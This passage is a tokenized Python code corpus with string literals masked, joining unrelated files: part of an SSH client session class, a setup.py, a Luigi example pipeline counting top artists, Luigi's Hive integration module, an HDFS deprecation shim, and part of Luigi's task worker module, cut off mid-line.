openChannel ( session ) <EOL> return deferred <EOL> def defaultSessionFactory ( env = { } , usePTY = False , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return SSHSession ( env , usePTY , * args , ** kwargs ) <EOL> class SSHSession ( SSHChannel ) : <EOL> name = '<STR_LIT>' <EOL> def __init__ ( self , env , usePTY , * args , ** kwargs ) : <EOL> SSHChannel . __init__ ( self , * args , ** kwargs ) <EOL> self . env = env <EOL> self . usePTY = usePTY <EOL> def sessionOpen ( self , specificData ) : <EOL> """<STR_LIT>""" <EOL> def channelOpen ( self , specificData ) : <EOL> self . requestEnv ( self . env ) <EOL> if self . usePTY : <EOL> self . requestPty ( ) <EOL> self . sessionOpen ( specificData ) <EOL> def requestShell ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . sendRequest ( '<STR_LIT>' , data = '<STR_LIT>' , wantReply = True ) <EOL> def requestExec ( self , commandLine ) : <EOL> """<STR_LIT>""" <EOL> data = common . NS ( commandLine ) <EOL> return self . sendRequest ( '<STR_LIT>' , data , wantReply = True ) <EOL> def requestSubsystem ( self , subsystem ) : <EOL> """<STR_LIT>""" <EOL> data = common . NS ( subsystem ) <EOL> return self . sendRequest ( '<STR_LIT>' , data , wantReply = True ) <EOL> def requestPty ( self , term = None , rows = <NUM_LIT:0> , cols = <NUM_LIT:0> , xpixel = <NUM_LIT:0> , ypixel = <NUM_LIT:0> , modes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> term = term or os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data = packRequest_pty_req ( term , ( rows , cols , xpixel , ypixel ) , modes ) <EOL> return self . sendRequest ( '<STR_LIT>' , data ) <EOL> def requestEnv ( self , env = { } ) : <EOL> """<STR_LIT>""" <EOL> for variable , value in env . iteritems ( ) : <EOL> data = common . NS ( variable ) + common . NS ( value ) <EOL> self . sendRequest ( '<STR_LIT>' , data ) <EOL> def sendRequest ( self , requestType , data , wantReply = False ) : <EOL> assert self . conn , "<STR_LIT>" <EOL> return self . conn . 
sendRequest ( self , requestType , data , wantReply ) </s>
<s> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' ] <EOL> ) </s>
<s> import random <EOL> from collections import defaultdict <EOL> from heapq import nlargest <EOL> from luigi import six <EOL> import luigi <EOL> import luigi . contrib . hadoop <EOL> import luigi . contrib . hdfs <EOL> import luigi . postgres <EOL> class ExternalStreams ( luigi . ExternalTask ) : <EOL> """<STR_LIT>""" <EOL> date = luigi . DateParameter ( ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . contrib . hdfs . HdfsTarget ( self . date . strftime ( '<STR_LIT>' ) ) <EOL> class Streams ( luigi . Task ) : <EOL> """<STR_LIT>""" <EOL> date = luigi . DateParameter ( ) <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . output ( ) . open ( '<STR_LIT:w>' ) as output : <EOL> for _ in range ( <NUM_LIT:1000> ) : <EOL> output . write ( '<STR_LIT>' . format ( <EOL> random . randint ( <NUM_LIT:0> , <NUM_LIT> ) , <EOL> random . randint ( <NUM_LIT:0> , <NUM_LIT> ) , <EOL> random . randint ( <NUM_LIT:0> , <NUM_LIT> ) ) ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . LocalTarget ( self . date . strftime ( '<STR_LIT>' ) ) <EOL> class StreamsHdfs ( Streams ) : <EOL> """<STR_LIT>""" <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . contrib . hdfs . HdfsTarget ( self . date . strftime ( '<STR_LIT>' ) ) <EOL> class AggregateArtists ( luigi . Task ) : <EOL> """<STR_LIT>""" <EOL> date_interval = luigi . DateIntervalParameter ( ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . LocalTarget ( "<STR_LIT>" . format ( self . date_interval ) ) <EOL> def requires ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ Streams ( date ) for date in self . date_interval ] <EOL> def run ( self ) : <EOL> artist_count = defaultdict ( int ) <EOL> for t in self . input ( ) : <EOL> with t . open ( '<STR_LIT:r>' ) as in_file : <EOL> for line in in_file : <EOL> _ , artist , track = line . strip ( ) . split ( ) <EOL> artist_count [ artist ] += <NUM_LIT:1> <EOL> with self . output ( ) . 
open ( '<STR_LIT:w>' ) as out_file : <EOL> for artist , count in six . iteritems ( artist_count ) : <EOL> out_file . write ( '<STR_LIT>' . format ( artist , count ) ) <EOL> class AggregateArtistsHadoop ( luigi . contrib . hadoop . JobTask ) : <EOL> """<STR_LIT>""" <EOL> date_interval = luigi . DateIntervalParameter ( ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . contrib . hdfs . HdfsTarget ( <EOL> "<STR_LIT>" % self . date_interval , <EOL> format = luigi . contrib . hdfs . PlainDir <EOL> ) <EOL> def requires ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ StreamsHdfs ( date ) for date in self . date_interval ] <EOL> def mapper ( self , line ) : <EOL> """<STR_LIT>""" <EOL> _ , artist , _ = line . strip ( ) . split ( ) <EOL> yield artist , <NUM_LIT:1> <EOL> def reducer ( self , key , values ) : <EOL> """<STR_LIT>""" <EOL> yield key , sum ( values ) <EOL> class Top10Artists ( luigi . Task ) : <EOL> """<STR_LIT>""" <EOL> date_interval = luigi . DateIntervalParameter ( ) <EOL> use_hadoop = luigi . BoolParameter ( ) <EOL> def requires ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . use_hadoop : <EOL> return AggregateArtistsHadoop ( self . date_interval ) <EOL> else : <EOL> return AggregateArtists ( self . date_interval ) <EOL> def output ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . LocalTarget ( "<STR_LIT>" % self . date_interval ) <EOL> def run ( self ) : <EOL> top_10 = nlargest ( <NUM_LIT:10> , self . _input_iterator ( ) ) <EOL> with self . output ( ) . open ( '<STR_LIT:w>' ) as out_file : <EOL> for streams , artist in top_10 : <EOL> out_line = '<STR_LIT:\t>' . join ( [ <EOL> str ( self . date_interval . date_a ) , <EOL> str ( self . date_interval . date_b ) , <EOL> artist , <EOL> str ( streams ) <EOL> ] ) <EOL> out_file . write ( ( out_line + '<STR_LIT:\n>' ) ) <EOL> def _input_iterator ( self ) : <EOL> with self . input ( ) . open ( '<STR_LIT:r>' ) as in_file : <EOL> for line in in_file : <EOL> artist , streams = line . 
strip ( ) . split ( ) <EOL> yield int ( streams ) , artist <EOL> class ArtistToplistToDatabase ( luigi . postgres . CopyToTable ) : <EOL> """<STR_LIT>""" <EOL> date_interval = luigi . DateIntervalParameter ( ) <EOL> use_hadoop = luigi . BoolParameter ( ) <EOL> host = "<STR_LIT:localhost>" <EOL> database = "<STR_LIT>" <EOL> user = "<STR_LIT>" <EOL> password = "<STR_LIT>" <EOL> table = "<STR_LIT>" <EOL> columns = [ ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> def requires ( self ) : <EOL> """<STR_LIT>""" <EOL> return Top10Artists ( self . date_interval , self . use_hadoop ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> luigi . run ( ) </s>
<s> import abc <EOL> import logging <EOL> import operator <EOL> import os <EOL> import subprocess <EOL> import tempfile <EOL> import warnings <EOL> from luigi import six <EOL> import luigi <EOL> import luigi . contrib . hadoop <EOL> from luigi . target import FileAlreadyExists , FileSystemTarget <EOL> from luigi . task import flatten <EOL> if six . PY3 : <EOL> unicode = str <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class HiveCommandError ( RuntimeError ) : <EOL> def __init__ ( self , message , out = None , err = None ) : <EOL> super ( HiveCommandError , self ) . __init__ ( message , out , err ) <EOL> self . message = message <EOL> self . out = out <EOL> self . err = err <EOL> def load_hive_cmd ( ) : <EOL> return luigi . configuration . get_config ( ) . get ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) . split ( '<STR_LIT:U+0020>' ) <EOL> def get_hive_syntax ( ) : <EOL> return luigi . configuration . get_config ( ) . get ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def run_hive ( args , check_return_code = True ) : <EOL> """<STR_LIT>""" <EOL> cmd = load_hive_cmd ( ) + args <EOL> p = subprocess . Popen ( cmd , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> stdout , stderr = p . communicate ( ) <EOL> if check_return_code and p . returncode != <NUM_LIT:0> : <EOL> raise HiveCommandError ( "<STR_LIT>" . format ( "<STR_LIT:U+0020>" . join ( cmd ) , p . returncode ) , <EOL> stdout , stderr ) <EOL> return stdout <EOL> def run_hive_cmd ( hivecmd , check_return_code = True ) : <EOL> """<STR_LIT>""" <EOL> return run_hive ( [ '<STR_LIT>' , hivecmd ] , check_return_code ) <EOL> def run_hive_script ( script ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isfile ( script ) : <EOL> raise RuntimeError ( "<STR_LIT>" . format ( script ) ) <EOL> return run_hive ( [ '<STR_LIT>' , script ] ) <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class HiveClient ( object ) : <EOL> @ abc . 
abstractmethod <EOL> def table_location ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ abc . abstractmethod <EOL> def table_schema ( self , table , database = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ abc . abstractmethod <EOL> def table_exists ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ abc . abstractmethod <EOL> def partition_spec ( self , partition ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class HiveCommandClient ( HiveClient ) : <EOL> """<STR_LIT>""" <EOL> def table_location ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> cmd = "<STR_LIT>" . format ( database , table ) <EOL> if partition is not None : <EOL> cmd += "<STR_LIT>" . format ( self . partition_spec ( partition ) ) <EOL> stdout = run_hive_cmd ( cmd ) <EOL> for line in stdout . split ( "<STR_LIT:\n>" ) : <EOL> if "<STR_LIT>" in line : <EOL> return line . split ( "<STR_LIT:\t>" ) [ <NUM_LIT:1> ] <EOL> def table_exists ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> if partition is None : <EOL> stdout = run_hive_cmd ( '<STR_LIT>' . format ( database , table ) ) <EOL> return stdout and table . lower ( ) in stdout <EOL> else : <EOL> stdout = run_hive_cmd ( """<STR_LIT>""" % ( database , table , self . partition_spec ( partition ) ) ) <EOL> if stdout : <EOL> return True <EOL> else : <EOL> return False <EOL> def table_schema ( self , table , database = '<STR_LIT:default>' ) : <EOL> describe = run_hive_cmd ( "<STR_LIT>" . format ( database , table ) ) <EOL> if not describe or "<STR_LIT>" in describe : <EOL> return None <EOL> return [ tuple ( [ x . strip ( ) for x in line . strip ( ) . split ( "<STR_LIT:\t>" ) ] ) for line in describe . strip ( ) . split ( "<STR_LIT:\n>" ) ] <EOL> def partition_spec ( self , partition ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:U+002C>' . join ( [ "<STR_LIT>" . 
format ( k , v ) for ( k , v ) in <EOL> sorted ( six . iteritems ( partition ) , key = operator . itemgetter ( <NUM_LIT:0> ) ) ] ) <EOL> class ApacheHiveCommandClient ( HiveCommandClient ) : <EOL> """<STR_LIT>""" <EOL> def table_schema ( self , table , database = '<STR_LIT:default>' ) : <EOL> describe = run_hive_cmd ( "<STR_LIT>" . format ( database , table ) , False ) <EOL> if not describe or "<STR_LIT>" in describe : <EOL> return None <EOL> return [ tuple ( [ x . strip ( ) for x in line . strip ( ) . split ( "<STR_LIT:\t>" ) ] ) for line in describe . strip ( ) . split ( "<STR_LIT:\n>" ) ] <EOL> class MetastoreClient ( HiveClient ) : <EOL> def table_location ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> with HiveThriftContext ( ) as client : <EOL> if partition is not None : <EOL> try : <EOL> import hive_metastore . ttypes <EOL> partition_str = self . partition_spec ( partition ) <EOL> thrift_table = client . get_partition_by_name ( database , table , partition_str ) <EOL> except hive_metastore . ttypes . NoSuchObjectException : <EOL> return '<STR_LIT>' <EOL> else : <EOL> thrift_table = client . get_table ( database , table ) <EOL> return thrift_table . sd . location <EOL> def table_exists ( self , table , database = '<STR_LIT:default>' , partition = None ) : <EOL> with HiveThriftContext ( ) as client : <EOL> if partition is None : <EOL> return table in client . get_all_tables ( database ) <EOL> else : <EOL> return partition in self . _existing_partitions ( table , database , client ) <EOL> def _existing_partitions ( self , table , database , client ) : <EOL> def _parse_partition_string ( partition_string ) : <EOL> partition_def = { } <EOL> for part in partition_string . split ( "<STR_LIT:/>" ) : <EOL> name , value = part . split ( "<STR_LIT:=>" ) <EOL> partition_def [ name ] = value <EOL> return partition_def <EOL> partition_strings = client . 
get_partition_names ( database , table , - <NUM_LIT:1> ) <EOL> return [ _parse_partition_string ( existing_partition ) for existing_partition in partition_strings ] <EOL> def table_schema ( self , table , database = '<STR_LIT:default>' ) : <EOL> with HiveThriftContext ( ) as client : <EOL> return [ ( field_schema . name , field_schema . type ) for field_schema in client . get_schema ( database , table ) ] <EOL> def partition_spec ( self , partition ) : <EOL> return "<STR_LIT:/>" . join ( "<STR_LIT>" % ( k , v ) for ( k , v ) in sorted ( six . iteritems ( partition ) , key = operator . itemgetter ( <NUM_LIT:0> ) ) ) <EOL> class HiveThriftContext ( object ) : <EOL> """<STR_LIT>""" <EOL> def __enter__ ( self ) : <EOL> try : <EOL> from thrift . transport import TSocket <EOL> from thrift . transport import TTransport <EOL> from thrift . protocol import TBinaryProtocol <EOL> from hive_metastore import ThriftHiveMetastore <EOL> config = luigi . configuration . get_config ( ) <EOL> host = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> port = config . getint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> transport = TSocket . TSocket ( host , port ) <EOL> transport = TTransport . TBufferedTransport ( transport ) <EOL> protocol = TBinaryProtocol . TBinaryProtocol ( transport ) <EOL> transport . open ( ) <EOL> self . transport = transport <EOL> return ThriftHiveMetastore . Client ( protocol ) <EOL> except ImportError as e : <EOL> raise Exception ( '<STR_LIT>' + str ( e ) ) <EOL> def __exit__ ( self , exc_type , exc_val , exc_tb ) : <EOL> self . transport . close ( ) <EOL> def get_default_client ( ) : <EOL> syntax = get_hive_syntax ( ) <EOL> if syntax == "<STR_LIT>" : <EOL> return ApacheHiveCommandClient ( ) <EOL> elif syntax == "<STR_LIT>" : <EOL> return MetastoreClient ( ) <EOL> else : <EOL> return HiveCommandClient ( ) <EOL> client = get_default_client ( ) <EOL> class HiveQueryTask ( luigi . contrib . hadoop . 
BaseHadoopJobTask ) : <EOL> """<STR_LIT>""" <EOL> n_reduce_tasks = None <EOL> bytes_per_reducer = None <EOL> reducers_max = None <EOL> @ abc . abstractmethod <EOL> def query ( self ) : <EOL> """<STR_LIT>""" <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> def hiverc ( self ) : <EOL> """<STR_LIT>""" <EOL> return luigi . configuration . get_config ( ) . get ( '<STR_LIT>' , '<STR_LIT>' , default = None ) <EOL> def hiveconfs ( self ) : <EOL> """<STR_LIT>""" <EOL> jcs = { } <EOL> jcs [ '<STR_LIT>' ] = "<STR_LIT:'>" + self . task_id + "<STR_LIT:'>" <EOL> if self . n_reduce_tasks is not None : <EOL> jcs [ '<STR_LIT>' ] = self . n_reduce_tasks <EOL> if self . pool is not None : <EOL> scheduler_type = luigi . configuration . get_config ( ) . get ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if scheduler_type == '<STR_LIT>' : <EOL> jcs [ '<STR_LIT>' ] = self . pool <EOL> elif scheduler_type == '<STR_LIT>' : <EOL> jcs [ '<STR_LIT>' ] = self . pool <EOL> if self . bytes_per_reducer is not None : <EOL> jcs [ '<STR_LIT>' ] = self . bytes_per_reducer <EOL> if self . reducers_max is not None : <EOL> jcs [ '<STR_LIT>' ] = self . reducers_max <EOL> return jcs <EOL> def job_runner ( self ) : <EOL> return HiveQueryRunner ( ) <EOL> class HiveQueryRunner ( luigi . contrib . hadoop . JobRunner ) : <EOL> """<STR_LIT>""" <EOL> def prepare_outputs ( self , job ) : <EOL> """<STR_LIT>""" <EOL> outputs = flatten ( job . output ( ) ) <EOL> for o in outputs : <EOL> if isinstance ( o , FileSystemTarget ) : <EOL> parent_dir = os . path . dirname ( o . path ) <EOL> if parent_dir and not o . fs . exists ( parent_dir ) : <EOL> logger . info ( "<STR_LIT>" , parent_dir ) <EOL> try : <EOL> o . fs . mkdir ( parent_dir ) <EOL> except FileAlreadyExists : <EOL> pass <EOL> def run_job ( self , job , tracking_url_callback = None ) : <EOL> if tracking_url_callback is not None : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , DeprecationWarning ) <EOL> self . 
prepare_outputs ( job ) <EOL> with tempfile . NamedTemporaryFile ( ) as f : <EOL> query = job . query ( ) <EOL> if isinstance ( query , unicode ) : <EOL> query = query . encode ( '<STR_LIT:utf8>' ) <EOL> f . write ( query ) <EOL> f . flush ( ) <EOL> arglist = load_hive_cmd ( ) + [ '<STR_LIT>' , f . name ] <EOL> hiverc = job . hiverc ( ) <EOL> if hiverc : <EOL> if isinstance ( hiverc , str ) : <EOL> hiverc = [ hiverc ] <EOL> for rcfile in hiverc : <EOL> arglist += [ '<STR_LIT>' , rcfile ] <EOL> if job . hiveconfs ( ) : <EOL> for k , v in six . iteritems ( job . hiveconfs ( ) ) : <EOL> arglist += [ '<STR_LIT>' , '<STR_LIT>' . format ( k , v ) ] <EOL> logger . info ( arglist ) <EOL> return luigi . contrib . hadoop . run_and_track_hadoop_job ( arglist , job . set_tracking_url ) <EOL> class HiveTableTarget ( luigi . Target ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , table , database = '<STR_LIT:default>' , client = None ) : <EOL> self . database = database <EOL> self . table = table <EOL> self . hive_cmd = load_hive_cmd ( ) <EOL> if client is None : <EOL> client = get_default_client ( ) <EOL> self . client = client <EOL> def exists ( self ) : <EOL> logger . debug ( "<STR_LIT>" , self . database , self . table ) <EOL> return self . client . table_exists ( self . table , self . database ) <EOL> @ property <EOL> def path ( self ) : <EOL> """<STR_LIT>""" <EOL> location = self . client . table_location ( self . table , self . database ) <EOL> if not location : <EOL> raise Exception ( "<STR_LIT>" . format ( str ( self ) ) ) <EOL> return location <EOL> def open ( self , mode ) : <EOL> return NotImplementedError ( "<STR_LIT>" ) <EOL> class HivePartitionTarget ( luigi . Target ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , table , partition , database = '<STR_LIT:default>' , fail_missing_table = True , client = None ) : <EOL> self . database = database <EOL> self . table = table <EOL> self . 
partition = partition <EOL> if client is None : <EOL> client = get_default_client ( ) <EOL> self . client = client <EOL> self . fail_missing_table = fail_missing_table <EOL> def exists ( self ) : <EOL> try : <EOL> logger . debug ( "<STR_LIT>" . format ( d = self . database , t = self . table , p = str ( self . partition ) ) ) <EOL> return self . client . table_exists ( self . table , self . database , self . partition ) <EOL> except HiveCommandError : <EOL> if self . fail_missing_table : <EOL> raise <EOL> else : <EOL> if self . client . table_exists ( self . table , self . database ) : <EOL> raise <EOL> else : <EOL> return False <EOL> @ property <EOL> def path ( self ) : <EOL> """<STR_LIT>""" <EOL> location = self . client . table_location ( self . table , self . database , self . partition ) <EOL> if not location : <EOL> raise Exception ( "<STR_LIT>" . format ( str ( self ) ) ) <EOL> return location <EOL> def open ( self , mode ) : <EOL> return NotImplementedError ( "<STR_LIT>" ) <EOL> class ExternalHiveTask ( luigi . ExternalTask ) : <EOL> """<STR_LIT>""" <EOL> database = luigi . Parameter ( default = '<STR_LIT:default>' ) <EOL> table = luigi . Parameter ( ) <EOL> partition = luigi . Parameter ( default = None , description = '<STR_LIT>' ) <EOL> def output ( self ) : <EOL> if self . partition is not None : <EOL> assert self . partition , "<STR_LIT>" <EOL> return HivePartitionTarget ( table = self . table , <EOL> partition = self . partition , <EOL> database = self . database ) <EOL> else : <EOL> return HiveTableTarget ( self . table , self . database ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> from luigi . contrib . hdfs import * <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import getpass <EOL> import logging <EOL> import multiprocessing <EOL> import os <EOL> import signal <EOL> import subprocess <EOL> import sys <EOL> try : <EOL> import Queue <EOL> except ImportError : <EOL> import queue as Queue <EOL> import random <EOL> import socket <EOL> import threading <EOL> import time <EOL> import traceback <EOL> import types <EOL> import warnings <EOL> from luigi import six <EOL> from luigi import notifications <EOL> from luigi . event import Event <EOL> from luigi . task_register import load_task <EOL> from luigi . scheduler import DISABLED , DONE , FAILED , PENDING , UNKNOWN , CentralPlannerScheduler <EOL> from luigi . target import Target <EOL> from luigi . task import Task , flatten , getpaths , Config <EOL> from luigi . task_register import TaskClassException <EOL> from luigi . task_status import RUNNING <EOL> from luigi . parameter import FloatParameter , IntParameter , BoolParameter <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> fork_lock = threading . Lock ( ) <EOL> _WAIT_INTERVAL_EPS = <NUM_LIT> <EOL> def _is_external ( task ) : <EOL> return task . run is None or task . run == NotImplemented <EOL> class TaskException ( Exception ) : <EOL> pass <EOL> class TaskProcess ( multiprocessing . Process ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , task , worker_id , result_queue , tracking_url_callback , <EOL> status_message_callback , random_seed = False , worker_timeout = <NUM_LIT:0> ) : <EOL> super ( TaskProcess , self ) . __init__ ( ) <EOL> self . task = task <EOL> self . worker_id = worker_id <EOL> self . result_queue = result_queue <EOL> self . tracking_url_callback = tracking_url_callback <EOL> self . status_message_callback = status_message_callback <EOL> self . random_seed = random_seed <EOL> if task . worker_timeout is not None : <EOL> worker_timeout = task . 
worker_timeout <EOL> self . timeout_time = time . time ( ) + worker_timeout if worker_timeout else None <EOL> def _run_get_new_deps ( self ) : <EOL> self . task . set_tracking_url = self . tracking_url_callback <EOL> self . task . set_status_message = self . status_message_callback <EOL> def deprecated_tracking_url_callback ( * args , ** kwargs ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , DeprecationWarning ) <EOL> self . tracking_url_callback ( * args , ** kwargs ) <EOL> run_again = False <EOL> try : <EOL> task_gen = self . task . run ( tracking_url_callback = deprecated_tracking_url_callback ) <EOL> except TypeError as ex : <EOL> if '<STR_LIT>' not in str ( ex ) : <EOL> raise <EOL> run_again = True <EOL> if run_again : <EOL> task_gen = self . task . run ( ) <EOL> self . task . set_tracking_url = None <EOL> self . task . set_status_message = None <EOL> if not isinstance ( task_gen , types . GeneratorType ) : <EOL> return None <EOL> next_send = None <EOL> while True : <EOL> try : <EOL> if next_send is None : <EOL> requires = six . next ( task_gen ) <EOL> else : <EOL> requires = task_gen . send ( next_send ) <EOL> except StopIteration : <EOL> return None <EOL> new_req = flatten ( requires ) <EOL> new_deps = [ ( t . task_module , t . task_family , t . to_str_params ( ) ) <EOL> for t in new_req ] <EOL> if all ( t . complete ( ) for t in new_req ) : <EOL> next_send = getpaths ( requires ) <EOL> else : <EOL> return new_deps <EOL> def run ( self ) : <EOL> logger . info ( '<STR_LIT>' , os . getpid ( ) , self . worker_id , self . task ) <EOL> if self . random_seed : <EOL> random . seed ( ( os . getpid ( ) , time . time ( ) ) ) <EOL> status = FAILED <EOL> expl = '<STR_LIT>' <EOL> missing = [ ] <EOL> new_deps = [ ] <EOL> try : <EOL> if not _is_external ( self . task ) : <EOL> missing = [ dep . task_id for dep in self . task . deps ( ) if not dep . 
complete ( ) ] <EOL> if missing : <EOL> deps = '<STR_LIT>' if len ( missing ) == <NUM_LIT:1> else '<STR_LIT>' <EOL> raise RuntimeError ( '<STR_LIT>' % ( deps , '<STR_LIT:U+002CU+0020>' . join ( missing ) ) ) <EOL> self . task . trigger_event ( Event . START , self . task ) <EOL> t0 = time . time ( ) <EOL> status = None <EOL> if _is_external ( self . task ) : <EOL> if self . task . complete ( ) : <EOL> status = DONE <EOL> else : <EOL> status = FAILED <EOL> expl = '<STR_LIT>' '<STR_LIT>' <EOL> else : <EOL> new_deps = self . _run_get_new_deps ( ) <EOL> status = DONE if not new_deps else PENDING <EOL> if new_deps : <EOL> logger . info ( <EOL> '<STR_LIT>' , <EOL> os . getpid ( ) , self . worker_id , self . task ) <EOL> elif status == DONE : <EOL> self . task . trigger_event ( <EOL> Event . PROCESSING_TIME , self . task , time . time ( ) - t0 ) <EOL> expl = self . task . on_success ( ) <EOL> logger . info ( '<STR_LIT>' , os . getpid ( ) , <EOL> self . worker_id , self . task ) <EOL> self . task . trigger_event ( Event . SUCCESS , self . task ) <EOL> except KeyboardInterrupt : <EOL> raise <EOL> except BaseException as ex : <EOL> status = FAILED <EOL> logger . exception ( "<STR_LIT>" , os . getpid ( ) , self . worker_id , self . task ) <EOL> self . task . trigger_event ( Event . FAILURE , self . task , ex ) <EOL> raw_error_message = self . task . on_failure ( ex ) <EOL> expl = raw_error_message <EOL> finally : <EOL> self . result_queue . put ( <EOL> ( self . task . task_id , status , expl , missing , new_deps ) ) <EOL> def _recursive_terminate ( self ) : <EOL> import psutil <EOL> try : <EOL> parent = psutil . Process ( self . pid ) <EOL> children = parent . children ( recursive = True ) <EOL> super ( TaskProcess , self ) . terminate ( ) <EOL> parent . wait ( ) <EOL> for child in children : <EOL> try : <EOL> child . terminate ( ) <EOL> except psutil . NoSuchProcess : <EOL> continue <EOL> except psutil . 
NoSuchProcess : <EOL> return <EOL> def terminate ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _recursive_terminate ( ) <EOL> except ImportError : <EOL> return super ( TaskProcess , self ) . terminate ( ) <EOL> class SingleProcessPool ( object ) : <EOL> """<STR_LIT>""" <EOL> def apply_async ( self , function , args ) : <EOL> return function ( * args ) <EOL> def close ( self ) : <EOL> pass <EOL> def join ( self ) : <EOL> pass <EOL> class DequeQueue ( collections . deque ) : <EOL> """<STR_LIT>""" <EOL> def put ( self , obj , block = None , timeout = None ) : <EOL> return self . append ( obj ) <EOL> def get ( self , block = None , timeout = None ) : <EOL> try : <EOL> return self . pop ( ) <EOL> except IndexError : <EOL> raise Queue . Empty <EOL> class AsyncCompletionException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , trace ) : <EOL> self . trace = trace <EOL> class TracebackWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , trace ) : <EOL> self . trace = trace <EOL> def check_complete ( task , out_queue ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( "<STR_LIT>" , task ) <EOL> try : <EOL> is_complete = task . complete ( ) <EOL> except Exception : <EOL> is_complete = TracebackWrapper ( traceback . format_exc ( ) ) <EOL> out_queue . 
put ( ( task , is_complete ) ) <EOL> class worker ( Config ) : <EOL> ping_interval = FloatParameter ( default = <NUM_LIT:1.0> , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> keep_alive = BoolParameter ( default = False , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> count_uniques = BoolParameter ( default = False , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> description = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> wait_interval = FloatParameter ( default = <NUM_LIT:1.0> , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> wait_jitter = FloatParameter ( default = <NUM_LIT> ) <EOL> max_reschedules = IntParameter ( default = <NUM_LIT:1> , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> timeout = IntParameter ( default = <NUM_LIT:0> , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> task_limit = IntParameter ( default = None , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) ) <EOL> retry_external_tasks = BoolParameter ( default = False , <EOL> config_path = dict ( section = '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> description = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> no_install_shutdown_handler = BoolParameter ( default = False , <EOL> description = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class KeepAliveThread ( threading . Thread ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scheduler , worker_id , ping_interval ) : <EOL> super ( KeepAliveThread , self ) . __init__ ( ) <EOL> self . _should_stop = threading . Event ( ) <EOL> self . _scheduler = scheduler <EOL> self . _worker_id = worker_id <EOL> self . _ping_interval = ping_interval <EOL> def stop ( self ) : <EOL> self . _should_stop . set ( ) <EOL> def run ( self ) : <EOL> while True : <EOL> self . _should_stop . wait ( self . _ping_interval ) <EOL> if self . _should_stop . 
